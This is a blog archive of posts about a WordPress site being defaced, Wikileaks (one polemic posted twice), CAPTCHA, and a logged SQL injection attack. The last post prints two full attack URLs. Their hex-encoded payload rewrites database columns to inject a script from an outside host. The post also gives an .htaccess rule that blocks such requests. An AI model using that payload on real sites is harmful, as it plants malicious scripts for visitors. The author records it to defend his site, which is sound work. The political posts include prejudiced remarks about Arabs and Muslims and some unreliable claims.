Tag Archive: DDoS

Turkish Hacker-Crackers, perhaps?

A Cracking Week Off?

I had a week’s holiday of sorts last week.  On returning I found that this website had been cracked. (I already had intimations that something was wrong because of site stat failures and an email from @Justin Asking, sometime commenter to this website and others).  Anyway, so it was.  Unfortunately, I didn’t have good web access so was unable to correct things properly.

The main screen, viewable on zone-h here, was replaced by this,

Site Hack Aug 2011

Site Hack Aug 2011

A neat little JavaScript mouse trailer was part of the package!

The cause was my own – a wide-open directory made so as part of an image upload plugin for my WordPress installation.  This plugin makes it easy and neat for any commenter to add material to the website……unfortunately for me, it allowed any file, with active content or not, to be uploaded.

Needless to say, the plugin is now disabled and the directory is locked down to the specific  file types that I’ll accept.  No more active content allowed there matey!

Unwanted Extras

Once the nasty files were uploaded, the internal site privileges allowed the install of a swathe of .htm files to the site root and uploads folder.  These had various names like f.htm, g.htm etc.  Index.htm was the file on show.

Alongside these, apart from files needed to run the previously mentioned JavaScript, were another swathe of .phtml files, such as joker.phtml, which are actually php code shining as html.  A couple of plain text files had also been uploaded.  These had lists of files, sites and persons.

All .htaccess files were okay as well as the WordPress installation files.  To be sure, I redid the WordPress install from scratch with fresh downloaded files..

Finale

All told, about fifty files were dumped on my website.  I’ve hopefully removed the lot and have them downloaded for analysis at a later date.  The screen content and internal code all points to Turkish or S.E. Asian (Vietnam or Indonesia) Muslim crackers (I refuse to use the hacker term except to clarify the cracking of security by it’s now-common usage).  Saying this, the culprits (the code points to several authors who used freely downloadable files from cracking websites and then proudly expected a pat on the back for their extreme skill at doing a download…like….der….), the culprits could have come from anywhere.

Fifth columnists and agent-provocateurs are nothing new.

Interestingly, being cracked puts me in the same company as at least 186 well-known multinational businesses, such as Acer, Vodaphone, BetFair, The Daily Telegraph, The Register, Spam.Org, Victoria Beckham and Destiny’s Child.

Even System of a Down dot com, was down!

Zone-h’s full list is here.  The Register reports it here, The Guardian here.

The Guardian interview with the crackers notes that the culprits had been planning the attack for some time which obviously includes the time when my site was compromised.  I don’t know if my website was actually used as part of the above DNS server attack but it’s usual for an attack like a DDOS to use several vectors and simultaneous attack points in order to force a server to fail and dump code.  This dump then reveals passwords and the like for later use.

Addendum

WordPress.Org’s forum has a posting about this crack from last week.  A Google search in the comment by RedNeckTexan shows the attack on this website to be far from unique….!   The links I’ve followed go right to the heart of the crack and the people doing the cracking.

This is the Google Search on the “Easy Comment Uploader” plugin.  Like me, RedNeckTexan has pulled the plugin for now, which can be found in the WordPress repository here.

Related Posts:

Comments are closed

Long Live Wikileaks!

Long Live Wikileaks!

Wikileaks at 213.251.145.96 Wikileaks at 213.251.145.96

These images will take you to the current IP addresses of Wikileaks. It follows on from my earlier help to the organisation here when a bunch of Swiss bankers mysteriously managed to influence “independent” judicial decisions in America.

The fact that I even have to do this is an abomination on the face of our so-called freedoms.

Governments: Unfit for purpose.

The Wikileaks “Cablegate” revelations have ensured that the vested interests of non-elected mad Arabs (UAE, Saudis) insisting that the US should bomb an elected group of mad Arabs (Iran) are plain for all to see.

They’ve also have ensured that a whole raft of dirty tricks are now afoot. Coincidentally (not), as soon as Wikileaks released all the”Cablegate” stuff into a full download, the US Gov could then see what was coming and the dirty tricks have become even deadlier, nastier, and even less freedom-loving. It obviously proves that worse revelations are to come.

The Obamas/Clinton democrats are now joined in unison with the US republicans bellowing for instant executions without trial, Israelis, Arabs, Chinese and a host of other countries in an amazingly eclectic unholy alliance that proves that the whole diplomatic world is a very unhealthy cabal of back-scratching plebian egoists with the safety and reputation of their own peoples far below that of the maintenance of their own expanding clique of free-loading arse-lickers.

The fact that they can get the tiny oligarchy of the DNS servers to pull the website index globally on whistle-blowers says it all about internet freedom and even the Internet’s resilience to nuclear attack (yes – its first purpose was to ensure that all nukes got released and that there would be some vestige of command and control, when invented by DARPA).

The fact that normal journalism is now so economically cow-towed that they are for the most part meekishly submissive to the authoritarian demands of various states and multi-national corporations, also says it all.

The fact that sexual allegations against Wikileaks founder coincided with the start of the leak about helicopter gunships mowing down unarmed civilians in broad daylight and have since been expanded to continue with the recent shut-down of the site following an unprecedented DDoS website attack says it all.

The fact that Wikileaks has upset all sides of all governments says it all and reveals them all to be unfit for purpose.

It makes me wonder if my father should’ve bothered turning up at D-Day or Okinawa. What was he fighting for, or against?

Buddhism, Ikeda, Mandela and Education

Today (coincidentally!), Daisaku Ikeda in his Daily Encouragement address to the world, said;

Monday, December 6th, 2010

—- DAILY ENCOURAGEMENT —-

“It has been more than 20 years since I first had the privilege of meeting with Nelson Mandela, the lionlike champion of human rights. Recently, former President Mandela, who had just turned 92, sent me an inscribed copy of his latest book. …I wish to share these words…as an expression of my deepest respect: ‘To the youth of today I also have a wish to make: ‘Be the script writers of your destiny and feature yourselves as the stars that show the way towards a brighter future–for our country, our continent and the world.’ ‘Education is the most powerful weapon we can use to change the world.‘”

What we see with the attacks upon Wikileaks, is an attack on freedom as it attacks the open knowledge base with which people need to be informed and thus educated. Without knowledge we are nothing.

We are like the women of Afghanistan, shackled by their surroundings of a male hierarchy and ignorant of everything except that which they’re told – except in our case, it’s our elected representatives who choose to hide the truth from us. And in the USA, with over 850,000 people now holding “top secret” status, (which is 1.5 times the population of Washington), we see that the weight of state machinery now devoted to hiding the truth, is immense.

What must be remembered, is that in nearly every single prominent Wikileak, the government has been found out to be doing bad things in our name. It’s nothing to do with national security as they claim, and everything to do with protecting those with comfy state jobs and a falsely clean reputation, no matter what they do.

Further Reading:

This is a copy of the main page entry.

Related Posts:

Wikileaks

Long Live Wikileaks!

 

Wikileaks

Wikileaks

The image will take you to the current IP address of Wikileaks.  It follows on from my earlier help to the organisation here when a bunch of Swiss bankers mysteriously managed to influence “independent”  judicial decisions in America.

The fact that I even have to do this is an abomination on the face of our so-called freedoms.

Governments: Unfit for purpose.

The Wikileaks “Cablegate” revelations have ensured that the vested interests of non-elected mad Arabs (UAE, Saudis) insisting that the US should bomb an elected group of mad Arabs (Iran) are plain for all to see.

They’ve also have ensured that a whole raft of dirty tricks are now afoot.  Coincidentally (not), as soon as Wikileaks released all the”Cablegate” stuff into a full download, the US Gov could then see what was coming and the dirty tricks have become even deadlier, nastier, and even less freedom-loving.  It obviously proves that worse revelations are to come.

The Obamas/Clinton democrats are now joined in unison with the US republicans bellowing for instant executions without trial, Israelis, Arabs, Chinese and a host of other countries in an amazingly eclectic unholy alliance  that proves that the whole diplomatic world is a very unhealthy cabal of back-scratching plebeian egoists with the safety and reputation of their own peoples far below that of the maintenance of their own expanding clique of free-loading arse-lickers.

The fact that they can get the tiny oligarchy of the DNS servers to pull the website index globally on whistle-blowers says it all about internet freedom and even the Internet’s resilience to nuclear attack (yes – its first purpose was to ensure that all nukes got released and that there would be some vestige of command and control, when invented by DARPA).

The fact that normal journalism is now so economically cow-towed that they are for the most part meekishly submissive to the authoritarian demands of various states and multi-national corporations, also says it all.

The fact that sexual allegations against Wikileaks founder coincided with the start of the leak about helicopter gunships mowing down unarmed civilians in broad daylight and have since been expanded to continue with the recent shut-down of the site following an unprecedented DDoS website attack says it all.

The fact that Wikileaks has upset all sides of all governments says it all and reveals them all to be unfit for purpose.

It makes me wonder if my father should’ve bothered turning up at D-Day or Okinawa.  What was he fighting for, or against?

Buddhism, Ikeda, Mandela and Education

Today (coincidentally!), Daisaku Ikeda in his Daily Encouragement address to the world, said;

Monday, December 6th, 2010

—- DAILY ENCOURAGEMENT —-

“It has been more than 20 years since I first had the privilege of meeting with Nelson Mandela, the lion-like champion of human rights. Recently, former President Mandela, who had just turned 92, sent me an inscribed copy of his latest book. …I wish to share these words…as an expression of my deepest respect: ‘To the youth of today I also have a wish to make: ‘Be the script writers of your destiny and feature yourselves as the stars that show the way towards a brighter future–for our country, our continent and the world.’ ‘Education is the most powerful weapon we can use to change the world.‘”

What we see with the attacks upon Wikileaks, is an attack on freedom as it attacks the open knowledge base with which people need to be informed and thus educated.  Without knowledge we are nothing.

We are like the women of Afghanistan, shackled by their surroundings of a male hierarchy and ignorant of everything except that which they’re told – except in our case, it’s our elected representatives who choose to hide the truth from us.  And in the USA, with over 850,000 people now holding “top secret” status, (which is 1.5 times the population of Washington), we see that the weight of state machinery now devoted to hiding the truth, is immense.

What must be remembered, is that in nearly every single prominent Wikileak, the government has been found out to be doing bad things in our name.  It’s nothing to do with national security as they claim, and everything to do with protecting those with comfy state jobs and a falsely clean reputation, no matter what they do.

Further Reading:

Related Posts:

Captcha Broken says Matt, I agree!

….That’s what I’ve determined empirically recently.  Matt’s (WordPress prime mover) post here and this article in the Guardian mention the various failings of CAPTCHA.

It’s the kind of thing that’s dawned on me progressively and is the reason I don’t use Captcha any more.  I’ve tested it and in the WordPress plugins that use it, I drop the option.  Part of the reason, initially, I admit, was because I couldn’t get it to work reliably across all my sites….

Because of software complexities and interactions, anyone who’s done this lark for a while knows the infuriating oddities that spring up with software, just when you least expect it!

So my modus operandi is to try lots of stuff (plugins etc), and any that have the slightest problem, slowness or irregularity get seriously looked at for 5 minutes, and if it’s un-solvable in that time, I ditch it!

As I said, the Captcha stuff came into this category, but simultaneously, I noticed subtle changes in the way and content of the various forms of spam reaching me.

Plugins that are actively monitored by their authors are also modified regularly as well (unless they were very good when they first wrote it!).  I’ve noticed something similar along these lines recently with a big splurge of almost daily updates from Akismet and Wp-SpamFree.   This suggests that the goalposts are moving rapidly currently, some of which I’ve mentioned in earlier posts like probable-ddos-attack-using-sql-injection-on-my-websites/, or false-invoice-e-mail-spam/ say.

Despite the Captcha problems Sabre is still good at blocking the false registration bastards.

And the basic Captcha priciple is showing really good humanitarian use as I mentioned here, another-positive-use-for-the-computer-to-human-interface/.  Ironic really – one does bad, one does good.

Related Posts:

Comments are closed

Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a mysql error message like so when I try to resolve the problem in phpAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;[email protected]%20

CHAR(4000);[email protected]=CAST(0x4445434C4152452040542

07661726368617228323535292C4043207661726368617

2283430303029204445434C415245205461626C655F437

572736F7220435552534F5220464F522073656C65637420

612E6E616D652C622E6E616D652066726F6D207379736F

626A6563747320612C737973636F6C756D6E7320622077

6865726520612E69643D622E696420616E6420612E7874

7970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479

70653D323331206F7220622E78747970653D313637292

04F50454E205461626C655F437572736F7220464554434

8204E4558542046524F4D20205461626C655F437572736

F7220494E544F2040542C4043205748494C45284040464

55443485F5354415455533D302920424547494E206578

65632827757064617465205B272B40542B275D2073657

4205B272B40432B275D3D2727223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777

302E646F7568756E716E2E636E2F63737273732F772E6A7

3223E3C2F7363726970743E3C212D2D27272B5B272B404

32B275D20776865726520272B40432B27206E6F74206C69

6B6520272725223E3C2F7469746C653E3C73637269707420

7372633D22687474703A2F2F777777302E646F7568756E

716E2E636E2F63737273732F772E6A73223E3C2F7363726

970743E3C212D2D272727294645544348204E455854204

6524F4D20205461626C655F437572736F7220494E544F20

40542C404320454E4420434C4F5345205461626C655F43

7572736F72204445414C4C4F43415445205461626C655F

437572736F72%20AS%20CHAR(4000));EXEC(@S);  (addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link.  My suspicions were now being raised because the page displayed okay.  This must be all the WordPress updating I’ve done.  It was a couple of updates back the the thing had some SQL Injection resistance built in.  It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so.   There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix that I’ve implemented I found here.

http://www.ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

# Added, protect from SQL Injection (sourced from) http://www.ravenphpscripts.com/postp122652.html
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
RewriteRule ^.* – [F,L]

This has done the trick.  Anything banging into my site with that in the string, is rejected.  I haven’t implemented a polite screen.  It just gets the standard response from my host as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

/?;[email protected]%20CHAR(4000);[email protected]=CAST(0x4445434

C415245204054207661726368617228323535292C4043207

6617263686172283430303029204445434C4152452054616

26C655F437572736F7220435552534F5220464F522073656C

65637420612E6E616D652C622E6E616D652066726F6D2073

79736F626A6563747320612C737973636F6C756D6E732062

20776865726520612E69643D622E696420616E6420612E78

747970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479706

53D323331206F7220622E78747970653D31363729204F5045

4E205461626C655F437572736F72204645544348204E45585

42046524F4D20205461626C655F437572736F7220494E544F

2040542C4043205748494C4528404046455443485F535441

5455533D302920424547494E206578656328277570646174

65205B272B40542B275D20736574205B272B40432B275D3D

2727223E3C2F7469746C653E3C736372697074207372633D

22687474703A2F2F777777302E646F7568756E716E2E636E2

F63737273732F772E6A73223E3C2F7363726970743E3C212D

2D27272B5B272B40432B275D20776865726520272B40432B

27206E6F74206C696B6520272725223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777302

E646F7568756E716E2E636E2F63737273732F772E6A73223E

3C2F7363726970743E3C212D2D272727294645544348204E

4558542046524F4D20205461626C655F437572736F722049

4E544F2040542C404320454E4420434C4F5345205461626C

655F437572736F72204445414C4C4F43415445205461626C6

55F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway so it looked in the browser address bar that everything was okay!

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me